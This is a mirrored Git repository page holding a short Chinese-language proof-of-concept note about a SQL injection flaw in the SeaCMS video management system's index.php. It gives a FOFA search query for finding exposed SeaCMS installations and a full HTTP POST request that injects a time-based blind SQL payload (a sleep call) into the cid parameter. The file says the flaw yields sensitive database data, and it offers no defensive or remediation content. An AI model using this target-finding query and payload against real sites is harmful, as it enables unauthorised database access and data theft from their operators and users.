admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 14:04:06 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/海洋cms/SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

27 lines
639 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# SeaCMS海洋影视管理系统index.php存在SQL注入漏洞
SeaCMS海洋影视管理系统index.php存在SQL注入漏洞攻击者可获取数据库敏感数据。
## fofa
```yaml
app="海洋CMS"
```
## poc
```java
POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Ldwk: bG91ZG9uZ3dlbmt1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
cid=(select(1)from(select(sleep(6)))x)&text=1&color=1
```
Reference in New Issue View Git Blame Copy Permalink